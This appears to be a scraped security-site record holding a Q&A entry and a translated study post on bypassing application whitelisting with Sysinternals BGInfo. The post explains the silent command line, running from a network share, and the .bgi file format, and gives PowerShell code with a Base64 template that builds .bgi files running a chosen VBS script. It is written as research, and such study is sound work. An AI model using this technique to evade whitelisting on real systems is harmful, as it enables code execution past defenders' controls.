[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fo9-NVp-4tdjhUi67CIB5Ra9ZmL1KxOm3c4zbNx6W2I8":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},553,"How can you automatically generate a malicious .bgi file using PowerShell?","You can write a PowerShell script that reads the fixed header (0x00000000 to 0x00000300) from a known `.bgi` template, encodes it as Base64, then decodes and writes it to a new file. Using `[System.IO.File]::WriteAllBytes()` and `[System.IO.FileStream]`, you append the flag byte (calculated as `path_length + 2`) and the VBS script path, then overwrite trailing `0D0A` bytes with nulls. This automation removes the need for manual GUI steps. The article [Study Notes of using BGInfo to bypass Application Whitelisting](\u002Fnews\u002Fstudy-notes-of-using-bginfo-to-bypass-application-whitelisting) provides the complete PowerShell code for this process.","\u003Cp>You can write a PowerShell script that reads the fixed header (0x00000000 to 0x00000300) from a known `.bgi` template, encodes it as Base64, then decodes and writes it to a new file. Using `[System.IO.File]::WriteAllBytes()` and `[System.IO.FileStream]`, you append the flag byte (calculated as `path_length + 2`) and the VBS script path, then overwrite trailing `0D0A` bytes with nulls. This automation removes the need for manual GUI steps. The article [Study Notes of using BGInfo to bypass Application Whitelisting](\u002Fnews\u002Fstudy-notes-of-using-bginfo-to-bypass-application-whitelisting) provides the complete PowerShell code for this process.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fstudy-notes-of-using-bginfo-to-bypass-application-whitelisting\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-you-automatically-generate-a-malicious-bgi-file-using-powershell-1777482923650","PowerShell, automatic BGI generation, binary file manipulation, Base64 encoding, attack automation",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},136,"Study Notes of using BGInfo to bypass Application Whitelisting","study-notes-of-using-bginfo-to-bypass-application-whitelisting","Learn how to bypass application whitelisting using BGInfo, with steps for editing .bgi files via PowerShell and an open-source script for automation.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I came across an interesting article titled 'Bypassing Application Whitelisting with BGInfo', which explains how to achieve whitelist bypass using BGInfo. I found it quite intriguing, so I studied and organized this content, and also open-sourced a PowerShell script for automatically generating .bgi files.\u003C\u002Fp>\u003Cp>The article link is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsitpros.com\u002F?p=3831\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to BGInfo\u003C\u002Fli>\u003Cli>Practical steps for bypassing whitelisting using BGInfo\u003C\u002Fli>\u003Cli>How to edit binary files using PowerShell\u003C\u002Fli>\u003Cli>How to develop a PowerShell script to automatically generate .bgi files\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 BGInfo\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Bginfo—Powerful Windows System Information Display Tool from Sysinternals Suite\u003C\u002Fp>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftechnet.microsoft.com\u002Fen-us\u002Fsysinternals\u002Fbb897557.aspx\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latest version of bginfo.exe is 4.22, while the version tested in this article is 4.21\u003C\u002Fp>\u003Ch3>1. Introduction\u003C\u002Fh3>\u003Cp>Can automatically display current Windows environment information in an area of the desktop\u003C\u002Fp>\u003Cp>Panel as shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017982352_0_d971aa33c6.jpeg\">\u003C\u002Fp>\u003Cp>After configuration, the desktop displays Windows environment information, as shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017987488_1_a26e0d9737.jpeg\">\u003C\u002Fp>\u003Cp>Edit the information to be displayed, which can be saved as config.bgi and imported when in use\u003C\u002Fp>\u003Ch3>2. Bginfo Command Line Mode\u003C\u002Fh3>\u003Cp>\u002Fh Displays help\u003C\u002Fp>\u003Cp>As shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017992474_2_13cf4b6190.jpeg\">\u003C\u002Fp>\u003Cp>The command to set desktop display information via command line is as follows:\u003C\u002Fp>\u003Cp>bginfo.exe config.bgi \u002Ftimer:0 \u002Fnolicprompt \u002Fsilent\u003C\u002Fp>\u003Ch3>3. Extension:\u003C\u002Fh3>\u003Cp>Click Custom to customize desktop display content, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017996663_3_44cf075243.jpeg\">\u003C\u002Fp>\u003Cp>Select New\u003C\u002Fp>\u003Cp>Set data sources, including environment variables, registry key values, WMI, files, VB Script scripts\u003C\u002Fp>\u003Ch3>4. Import WMI query:\u003C\u002Fh3>\u003Cp>Add a WMI query, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018000564_4_76d7050c1f.jpeg\">\u003C\u002Fp>\u003Cp>Add display content on the face, modify the desktop, successfully display new content, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018004801_5_1896e5db2f.jpeg\">\u003C\u002Fp>\u003Ch3>5. Import VBS:\u003C\u002Fh3>\u003Cp>Add a vbs query. For vbs script reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.githubusercontent.com\u002Fapi0cradle\u002Fefc90f8318556f0737791b6d73a4ec8b\u002Fraw\u002F9a46f4cdacb5752e721e1e3701308939351b4768\u002Fgistfile1.txt\u003C\u002Fp>\u003Cp>This VBS script implements:\u003C\u002Fp>\u003Cul>\u003Cli>Launch cmd.exe\u003C\u002Fli>\u003Cli>Output on desktop: \"Does not matter what this says\"\u003C\u002Fli>\u003C\u002Ful>\u003Cp>After importing this VBS script, click Apply, successfully launches cmd.exe and outputs 'Does not matter what this says' on the desktop\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018009546_6_4fa059ec45.jpeg\">\u003C\u002Fp>\u003Cp>The entire launch process can also be achieved under cmd\u003C\u002Fp>\u003Cp>(1) Save the above bgi project as vbs.bgi\u003C\u002Fp>\u003Cp>(2) cmd:\u003C\u002Fp>\u003Cp>bginfo.exe vbs.bgi \u002Ftimer:0 \u002Fnolicprompt \u002Fsilent\u003C\u002Fp>\u003Ch3>6. bginfo.exe and vbs.bgi can be placed on a remote server and executed via network share access\u003C\u002Fh3>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>\\\\WIN-FVJLPTISCFE\\test\\bginfo.exe \\\\WIN-FVJLPTISCFE\\test\\test1.bgi \u002Ftimer:0 \u002Fnolicprompt \u002Fsilent\u003C\u002Fp>\u003Cp>Complete operation as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018011941_7_dcbf82967e.png\">\u003C\u002Fp>\u003Ch2>0x03 Bypassing Whitelist via Bginfo\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>The complete process is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>1. Start bginfo.exe, add the import VBS script function, set the VBS script path, and remove desktop display content\u003C\u002Fp>\u003Cp>2. Save the bgi project as a .bgi file\u003C\u002Fp>\u003Cp>3. Execute the command line code:\u003C\u002Fp>\u003Cp>bginfo.exe vbs.bgi \u002Ftimer:0 \u002Fnolicprompt \u002Fsilent\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The version of bginfo.exe must be lower than 4.22, as version 4.22 has fixed the above issue\u003C\u002Fp>\u003Cp>The entire bypass process is simple, but steps 1 and 2 are relatively troublesome. Viewing vbs.bgi with UltraEdit reveals content as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018014219_8_69f023315d.jpeg\">\u003C\u002Fp>\u003Cp>It appears to follow a certain format, so can a PowerShell script be used to automatically generate the .bgi file?\u003C\u002Fp>\u003Ch2>0x04 BGI File Format\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Guessing the bgi file format through file comparison\u003C\u002Fp>\u003Cp>Using hexadecimal file comparison tool: Beyond Compare\u003C\u002Fp>\u003Cp>Set different vbs paths respectively and compare the differences, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018016051_9_f12cf793ed.jpeg\">\u003C\u002Fp>\u003Cp>It is not difficult to find that the differences only exist in the vbs paths starting from 0x00000301 and 0x00000306\u003C\u002Fp>\u003Cp>0x00000000-0x00000300 is a fixed format\u003C\u002Fp>\u003Cp>The length of the string C:\\test\\1.vbs is 13, the flag value at 0x00000301 is 0x0F, which is 15 in decimal\u003C\u002Fp>\u003Cp>The length of the string C:\\test\\cmd.vbs is 15, the flag value at 0x00000301 is 0x11, which is 17 in decimal\u003C\u002Fp>\u003Cp>\u003Cstrong>Bold guess:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The flag at 0x00000301 indicates the content as: vbs path length + 2, and saved in hexadecimal\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The disk directory C in the vbs path C:\\test\\1.vbs must be uppercase, otherwise a file format error will be prompted\u003C\u002Fp>\u003Ch2>0x05 How to use powershell to edit binary files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The most common way to read and write files using powershell is:\u003C\u002Fp>\u003Cp>Read file: Get-content\u003C\u002Fp>\u003Cp>Write file: Set-content\u003C\u002Fp>\u003Cp>However, for non-txt files, if special characters exist, the above methods may cause bugs by automatically filtering special strings, resulting in different lengths and content errors\u003C\u002Fp>\u003Cp>Binary file read\u002Fwrite methods:\u003C\u002Fp>\u003Cp>Read binary file:\u003C\u002Fp>\u003Cp>[System.IO.File]::ReadAllBytes('1.txt')\u003C\u002Fp>\u003Cp>Write binary file:\u003C\u002Fp>\u003Cp>[System.IO.File]::WriteAllBytes(\"1.txt\",$fileContentBytes)\u003C\u002Fp>\u003Cp>Modify binary file:\u003C\u002Fp>\u003Cp>Using system.io.filestream\u003C\u002Fp>\u003Cp>Code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fs=new-object io.filestream \"test1.bgi\",open\u003Cbr>$fs.seek(0,2)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.flush()\u003Cbr>$fs.close()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Parameter description:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>$fs=new-object io.filestream \"test1.bgi\",open:\u003C\u002Fp>\u003Cul>\u003Cli>open means append, createnew means create new\u003C\u002Fli>\u003C\u002Ful>\u003Cp>$fs.seek(0,2):\u003C\u002Fp>\u003Cul>\u003Cli>The first parameter indicates offset\u003C\u002Fli>\u003Cli>The second parameter: 0 means starting from the beginning of the file, 1 means starting from the current position, 2 means starting from the end of the file\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x06 Write a PowerShell script to automatically generate .bgi files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Development approach:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Read the content from 0x00000000 to 0x00000300, perform base64 encoding and save it in variable $fileContent\u003C\u002Fp>\u003Cp>Decode the base64 of variable $fileContent and write it to a new file test1.bgi\u003C\u002Fp>\u003Cp>Use append mode to sequentially write flag bits, vbs paths, and other padding bits to the file\u003C\u002Fp>\u003Cp>\u003Cstrong>Process as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Write the content from 0x00000000 to 0x00000300\u003C\u002Fli>\u003Cli>Calculate flag bits\u003C\u002Fli>\u003Cli>Write flag bits in binary mode\u003C\u002Fli>\u003Cli>Use Out-File to append vbs path to file, but redundant data 0D0A will exist\u003C\u002Fli>\u003Cli>Offset -2, fill other positions in binary mode, overwriting redundant data 0D0A\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Key code as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Save content from 0x00000000-0x00000300 as 1.bgi\u003C\u002Fp>\u003Cp>powershell code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fileContent = [System.IO.File]::ReadAllBytes('1.bgi')\u003Cbr>$fileContentEncoded = [System.Convert]::ToBase64String($fileContent)| set-content (\"buffer.txt\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generate buffer.txt with the following content:\u003C\u002Fp>\u003Cp>CwAAAEJhY2tncm91bmQABAAAAAQAAAAAAAAACQAAAFBvc2l0aW9uAAQAAAAEAAAA\u002FgMAAAgAAABNb25pdG9yAAQAAAAEAAAAXAQAAA4AAABUYXNrYmFyQWRqdXN0AAQAAAAEAAAAAQAAAAsAAABUZXh0V2lkdGgyAAQAAAAEAAAAwHsAAAsAAABPdXRwdXRGaWxlAAEAAAASAAAAJVRlbXAlXEJHSW5mby5ibXAACQAAAERhdGFiYXNlAAEAAAABAAAAAAwAAABEYXRhYmFzZU1SVQABAAAABAAAAAAAAAAKAAAAV2FsbHBhcGVyAAEAAAABAAAAAA0AAABXYWxscGFwZXJQb3MABAAAAAQAAAACAAAADgAAAFdhbGxwYXBlclVzZXIABAAAAAQAAAABAAAADQAAAE1heENvbG9yQml0cwAEAAAABAAAAAAAAAAMAAAARXJyb3JOb3RpZnkABAAAAAQAAAAAAAAACwAAAFVzZXJTY3JlZW4ABAAAAAQAAAABAAAADAAAAExvZ29uU2NyZWVuAAQAAAAEAAAAAAAAAA8AAABUZXJtaW5hbFNjcmVlbgAEAAAABAAAAAAAAAAOAAAAT3BhcXVlVGV4dEJveAAEAAAABAAAAAAAAAAEAAAAUlRGAAEAAADvAAAAe1xydGYxXGFuc2lcYW5zaWNwZzkzNlxkZWZmMFxkZWZsYW5nMTAzM1xkZWZsYW5nZmUyMDUye1xmb250dGJse1xmMFxmbmlsXGZjaGFyc2V0MTM0IEFyaWFsO319DQp7XGNvbG9ydGJsIDtccmVkMjU1XGdyZWVuMjU1XGJsdWUyNTU7fQ0KXHZpZXdraW5kNFx1YzFccGFyZFxmaS0yODgwXGxpMjg4MFx0eDI4ODBcY2YxXGxhbmcyMDUyXGJccHJvdGVjdFxmMFxmczI0IDx2YnM+XHByb3RlY3QwXHBhcg0KXHBhcg0KfQ0KAAALAAAAVXNlckZpZWxkcwAAgACAAAAAAAQAAAB2YnMAAQAAAA==\u003C\u002Fp>\u003Cp>Save it in variable $fileContent, decrypt and write to file test1.bgi\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fileContent = \"CwAAAEJhY2tncm91bmQABAAAAAQAAAAAAAAACQAAAFBvc2l0aW9uAAQAAAAEAAAA\u002FgMAAAgAAABNb25pdG9yAAQAAAAEAAAAXAQAAA4AAABUYXNrYmFyQWRqdXN0AAQAAAAEAAAAAQAAAAsAAABUZXh0V2lkdGgyAAQAAAAEAAAAwHsAAAsAAABPdXRwdXRGaWxlAAEAAAASAAAAJVRlbXAlXEJHSW5mby5ibXAACQAAAERhdGFiYXNlAAEAAAABAAAAAAwAAABEYXRhYmFzZU1SVQABAAAABAAAAAAAAAAKAAAAV2FsbHBhcGVyAAEAAAABAAAAAA0AAABXYWxscGFwZXJQb3MABAAAAAQAAAACAAAADgAAAFdhbGxwYXBlclVzZXIABAAAAAQAAAABAAAADQAAAE1heENvbG9yQml0cwAEAAAABAAAAAAAAAAMAAAARXJyb3JOb3RpZnkABAAAAAQAAAAAAAAACwAAAFVzZXJTY3JlZW4ABAAAAAQAAAABAAAADAAAAExvZ29uU2NyZWVuAAQAAAAEAAAAAAAAAA8AAABUZXJtaW5hbFNjcmVlbgAEAAAABAAAAAAAAAAOAAAAT3BhcXVlVGV4dEJveAAEAAAABAAAAAAAAAAEAAAAUlRGAAEAAADvAAAAe1xydGYxXGFuc2lcYW5zaWNwZzkzNlxkZWZmMFxkZWZsYW5nMTAzM1xkZWZsYW5nZmUyMDUye1xmb250dGJse1xmMFxmbmlsXGZjaGFyc2V0MTM0IEFyaWFsO319DQp7XGNvbG9ydGJsIDtccmVkMjU1XGdyZWVuMjU1XGJsdWUyNTU7fQ0KXHZpZXdraW5kNFx1YzFccGFyZFxmaS0yODgwXGxpMjg4MFx0eDI4ODBcY2YxXGxhbmcyMDUyXGJccHJvdGVjdFxmMFxmczI0IDx2YnM+XHByb3RlY3QwXHBhcg0KXHBhcg0KfQ0KAAALAAAAVXNlckZpZWxkcwAAgACAAAAAAAQAAAB2YnMAAQAAAA==\"\u003Cbr>$fileContentBytes = [System.Convert]::FromBase64String($fileContent)\u003Cbr>[System.IO.File]::WriteAllBytes(\"test1.bgi\",$fileContentBytes)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Flag bit calculation:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$VbsPath=\"C:\\test\\1.vbs\"\u003Cbr>$Length=$VbsPath.Length+2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Write length flag bit + idle padding bits\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fs=new-object io.filestream \"test1.bgi\",open\u003Cbr>$fs.seek(0,2)\u003Cbr>$fs.writebyte($Length)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x34)\u003Cbr>$fs.flush()\u003Cbr>$fs.close()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Append and write VBS script path:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$VbsPath | Out-File -Encoding ascii -Append test1.bgi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>There is redundant data 0D0A, so the offset should be -2, writing to free padding bits:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fs=new-object io.filestream \"test1.bgi\",open\u003Cbr>$fs.seek(-2,2)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x01)\u003Cbr>$fs.writebyte(0x80)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x80)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.flush()\u003Cbr>$fs.close()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Complete code has been uploaded to GitHub:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Complete operation as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018017781_10_d6f78f1694.png\">\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of bypassing whitelists via BGInfo, along with the technique of editing binary files using PowerShell. It also open-sources a PowerShell script for generating .bgi files, hoping to assist everyone.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I came across an interesting article titled 'Bypassing Application Whitelisting with BGInfo', which explains how to achieve whitelist bypass using BGInfo. I found it quite intriguing, so I studied and organized this content, and also open-sourced a PowerShell script for automatically generating .bgi files.\u003C\u002Fp>\u003Cp>The article link is as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsitpros.com\u002F?p=3831\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to BGInfo\u003C\u002Fli>\u003Cli>Practical steps for bypassing whitelisting using BGInfo\u003C\u002Fli>\u003Cli>How to edit binary files using PowerShell\u003C\u002Fli>\u003Cli>How to develop a PowerShell script to automatically generate .bgi files\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 BGInfo\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Bginfo—Powerful Windows System Information Display Tool from Sysinternals Suite\u003C\u002Fp>\u003Cp>\u003Cstrong>Download link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftechnet.microsoft.com\u002Fen-us\u002Fsysinternals\u002Fbb897557.aspx\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latest version of bginfo.exe is 4.22, while the version tested in this article is 4.21\u003C\u002Fp>\u003Ch3>1. Introduction\u003C\u002Fh3>\u003Cp>Can automatically display current Windows environment information in an area of the desktop\u003C\u002Fp>\u003Cp>Panel as shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017982352_0_d971aa33c6-1.jpeg\">\u003C\u002Fp>\u003Cp>After configuration, the desktop displays Windows environment information, as shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017987488_1_a26e0d9737-1.jpeg\">\u003C\u002Fp>\u003Cp>Edit the information to be displayed, which can be saved as config.bgi and imported when in use\u003C\u002Fp>\u003Ch3>2. Bginfo Command Line Mode\u003C\u002Fh3>\u003Cp>\u002Fh Displays help\u003C\u002Fp>\u003Cp>As shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017992474_2_13cf4b6190-1.jpeg\">\u003C\u002Fp>\u003Cp>The command to set desktop display information via command line is as follows:\u003C\u002Fp>\u003Cp>bginfo.exe config.bgi \u002Ftimer:0 \u002Fnolicprompt \u002Fsilent\u003C\u002Fp>\u003Ch3>3. Extension:\u003C\u002Fh3>\u003Cp>Click Custom to customize desktop display content, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017996663_3_44cf075243-1.jpeg\">\u003C\u002Fp>\u003Cp>Select New\u003C\u002Fp>\u003Cp>Set data sources, including environment variables, registry key values, WMI, files, VB Script scripts\u003C\u002Fp>\u003Ch3>4. Import WMI query:\u003C\u002Fh3>\u003Cp>Add a WMI query, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018000564_4_76d7050c1f-1.jpeg\">\u003C\u002Fp>\u003Cp>Add display content on the face, modify the desktop, successfully display new content, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018004801_5_1896e5db2f-1.jpeg\">\u003C\u002Fp>\u003Ch3>5. Import VBS:\u003C\u002Fh3>\u003Cp>Add a vbs query. For vbs script reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.githubusercontent.com\u002Fapi0cradle\u002Fefc90f8318556f0737791b6d73a4ec8b\u002Fraw\u002F9a46f4cdacb5752e721e1e3701308939351b4768\u002Fgistfile1.txt\u003C\u002Fp>\u003Cp>This VBS script implements:\u003C\u002Fp>\u003Cul>\u003Cli>Launch cmd.exe\u003C\u002Fli>\u003Cli>Output on desktop: \"Does not matter what this says\"\u003C\u002Fli>\u003C\u002Ful>\u003Cp>After importing this VBS script, click Apply, successfully launches cmd.exe and outputs 'Does not matter what this says' on the desktop\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018009546_6_4fa059ec45-1.jpeg\">\u003C\u002Fp>\u003Cp>The entire launch process can also be achieved under cmd\u003C\u002Fp>\u003Cp>(1) Save the above bgi project as vbs.bgi\u003C\u002Fp>\u003Cp>(2) cmd:\u003C\u002Fp>\u003Cp>bginfo.exe vbs.bgi \u002Ftimer:0 \u002Fnolicprompt \u002Fsilent\u003C\u002Fp>\u003Ch3>6. bginfo.exe and vbs.bgi can be placed on a remote server and executed via network share access\u003C\u002Fh3>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>\\\\WIN-FVJLPTISCFE\\test\\bginfo.exe \\\\WIN-FVJLPTISCFE\\test\\test1.bgi \u002Ftimer:0 \u002Fnolicprompt \u002Fsilent\u003C\u002Fp>\u003Cp>Complete operation as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018011941_7_dcbf82967e-1.png\">\u003C\u002Fp>\u003Ch2>0x03 Bypassing Whitelist via Bginfo\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>The complete process is as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>1. Start bginfo.exe, add the import VBS script function, set the VBS script path, and remove desktop display content\u003C\u002Fp>\u003Cp>2. Save the bgi project as a .bgi file\u003C\u002Fp>\u003Cp>3. Execute the command line code:\u003C\u002Fp>\u003Cp>bginfo.exe vbs.bgi \u002Ftimer:0 \u002Fnolicprompt \u002Fsilent\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The version of bginfo.exe must be lower than 4.22, as version 4.22 has fixed the above issue\u003C\u002Fp>\u003Cp>The entire bypass process is simple, but steps 1 and 2 are relatively troublesome. Viewing vbs.bgi with UltraEdit reveals content as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018014219_8_69f023315d-1.jpeg\">\u003C\u002Fp>\u003Cp>It appears to follow a certain format, so can a PowerShell script be used to automatically generate the .bgi file?\u003C\u002Fp>\u003Ch2>0x04 BGI File Format\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Guessing the bgi file format through file comparison\u003C\u002Fp>\u003Cp>Using hexadecimal file comparison tool: Beyond Compare\u003C\u002Fp>\u003Cp>Set different vbs paths respectively and compare the differences, as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018016051_9_f12cf793ed-1.jpeg\">\u003C\u002Fp>\u003Cp>It is not difficult to find that the differences only exist in the vbs paths starting from 0x00000301 and 0x00000306\u003C\u002Fp>\u003Cp>0x00000000-0x00000300 is a fixed format\u003C\u002Fp>\u003Cp>The length of the string C:\\test\\1.vbs is 13, the flag value at 0x00000301 is 0x0F, which is 15 in decimal\u003C\u002Fp>\u003Cp>The length of the string C:\\test\\cmd.vbs is 15, the flag value at 0x00000301 is 0x11, which is 17 in decimal\u003C\u002Fp>\u003Cp>\u003Cstrong>Bold guess:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The flag at 0x00000301 indicates the content as: vbs path length + 2, and saved in hexadecimal\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The disk directory C in the vbs path C:\\test\\1.vbs must be uppercase, otherwise a file format error will be prompted\u003C\u002Fp>\u003Ch2>0x05 How to use 